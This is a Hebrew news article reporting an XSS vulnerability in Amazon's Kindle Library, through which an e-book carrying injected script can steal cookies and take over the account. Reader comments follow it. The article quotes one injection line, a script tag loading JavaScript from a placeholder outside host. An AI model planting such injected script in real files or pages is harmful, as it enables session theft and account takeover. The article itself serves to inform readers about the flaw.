קונים באמזון? פרצת אבטחה חדשה מאפשרת להאקרים להשתלט לכם על החשבון

פרצת אבטחה מאפשרת לכל האקר להשתלט על חשבון האמזון שלכם, על ידי השתלה של קוד זדוני בספר דיגיטלי שאתם מורידים לקינדל שלכם. אמזון אגב עדיין לא סתמה את הפרצה

!!!pwned. מקור: b.fl7.de

!!!pwned. מקור: b.fl7.de

כל מה שרצו כמה קוראים, בעלי חשבון באמזון, היה להוריד ספר חדש לקורא הקינדל שלהם. מסיבה לא ברורה הם לא השתמשו באתר אמזון, אלא בחרו להוריד את הספר ממקור לא ברור, כלומר לינק כלשהו, ובתמורה הם זכו להיות גיבורים של ספר מתח, שלא לומר אימה.

כל אחד יכול להשתלט על חשבון אמזון

על פי דיווח שהופיע בבלוג הקוראים הדיגיטליים The Digital Reader, את הפרצה גילה חוקר האבטחה בנג’מין מוסלר. מדובר בפרצת אבטחה מסוג Cross-Site Scripting – XSS. בעזרת פרצת אבטחה זו יכול כל האקר לקבל גישה מלאה לחשבון האמזון שלכם, ולמעשה להשתלט עליו, ולשלול ממכם את הגישה אליו. הפרצה נעשית על ידי שתילה של קוד זדוני בספר אלקטרוני שאתם מורידים, קוד שרץ בזמן שאתם פותחים את הספר, כדי לקרוא אותו.

כדי לעשות זאת, משנה ההאקר את התוכן של ספר דיגיטלי, ומכניס לתוכו את השורה <script src=”https://www.example.org/script.js”></script>. כתוצאה מכך ההאקר יכול להגיע לקוקיז של הקורבן, וכך להכנס לחשבון שלו באמזון. משם, הדרך קצרה לשינוי פרטי הגישה לחשבון ולמעשה חסימה של המשתמש מהחשבון שלו עצמו. לפרצה חשופים בעקרון כל לקוחות אמזון בעלי קינדל שמשתמשים ב-Kindle Library כדי לאחסן ספרים דיגיטליים או להעביר אותם לקינדל. אולם בפועל, מי שצפוי להיפגע הוא כל מי שמחפש ספרים דיגיטליים באתרים מפוקפקים, שאינם חנויות ספרים מוכרות. במילים אחרות, כל מי שמחפש ספרים פיראטיים. אם אתם משתמשים רק באמזון, כדי להעשיר את ספריית הקינדל שלכם, אתם בטוחים. ככל הנראה ברגע שההאקר השתלט לכם על החשבון הוא לא יוכל לשנות את הכתובת של המשלוח (כי אז יצטרך להזין שוב את פרטי כרטיס האשראי שאינם ברשותו), אולם הוא כנראה כן יוכל להזמין ספרים על חשבונכם (עם קרדיט ה-Giftcard שלכם למשל).

מוסלר מאפשר לכל אחד להתנסות בפרצת האבטחה על ידי הורדה של הקובץ הערוך ושליחתו לקינדל. מה שמעניין הוא שאמזון היתה מודעת לפרצה לפני כשנה ואף טיפלה בה לפני כעשרה חודשים. למרות זאת, באחד מהעדכונים שלה, צצה ועלתה שוב הפרצה, ונכון לכתיבת שורות אלו היא עדיין קיימת. למרות שאמזון יודעת על הפרצה על ידי חוקר האבטחה כבר לפני כחודשיים, הרי שהוא לא קיבל מענה לפנייתו.

 אז מה אפשר לעשות?

לא ברור מדוע אמזון גוררת רגליים בטיפול בפרצת האבטחה הזו. חובבי הקונספירציות יטענו, שהאינטרס של אמזון הוא שתורידו ספרים רק מהאתר הרשמי שלה ולכן, טיפול בפרצות מסוג זה אינו בראש סדר העדיפויות שלה. למרות זאת יש לזכור כי גם אמזון עצמה אינה חסינה, כפי שראינו לפני 4 שנים בפרצת אבטחה דומה. כך או כך, נראה שההמלצה הטובה ביותר להמנע ממצבים כאלו היא פשוט לא להוריד ספרים ממקורות מפוקפקים. אם לא מסיבות מוסריות, לפחות מסיבות של אבטחה.

יניב אביטל

עורך אתר גיקטיים, ובזמנו החופשי גיק, קופירייטר, אבא, חולה על גאדג'טים וקוד, לא בהכרח בסדר הזה

הגב

2 תגובות על "קונים באמזון? פרצת אבטחה חדשה מאפשרת להאקרים להשתלט לכם על החשבון"

avatar
Photo and Image Files
 
 
 
Audio and Video Files
 
 
 
Other File Types
 
 
 

* היי, אנחנו אוהבים תגובות!
תיקונים, תגובות קוטלות וכמובן תגובות מפרגנות - בכיף.
חופש הביטוי הוא ערך עליון, אבל לא נוכל להשלים עם תגובות שכוללות הסתה, הוצאת דיבה, תגובות שכוללות מידע המפר את תנאי השימוש של Geektime, תגובות שחורגות מהטעם הטוב ותגובות שהן בניגוד לדין. תגובות כאלו יימחקו מייד.

סידור לפי:   חדש | ישן | הכי מדורגים
יהונתן
Guest

איך יש XSS בebook? נשמע הזוי

חיים
Guest

באמזון המשלוחים ממש יקרים לישראל… אני אופתע אם עדיין אנשים רוכשים שם במקום באיביי או חנויות אחרות ברשת ששולחות לארץ בזול.

אם אתם קונים ספרים ממליץ על:
http://www.bookdepositorycom

wpDiscuz

תגיות לכתבה: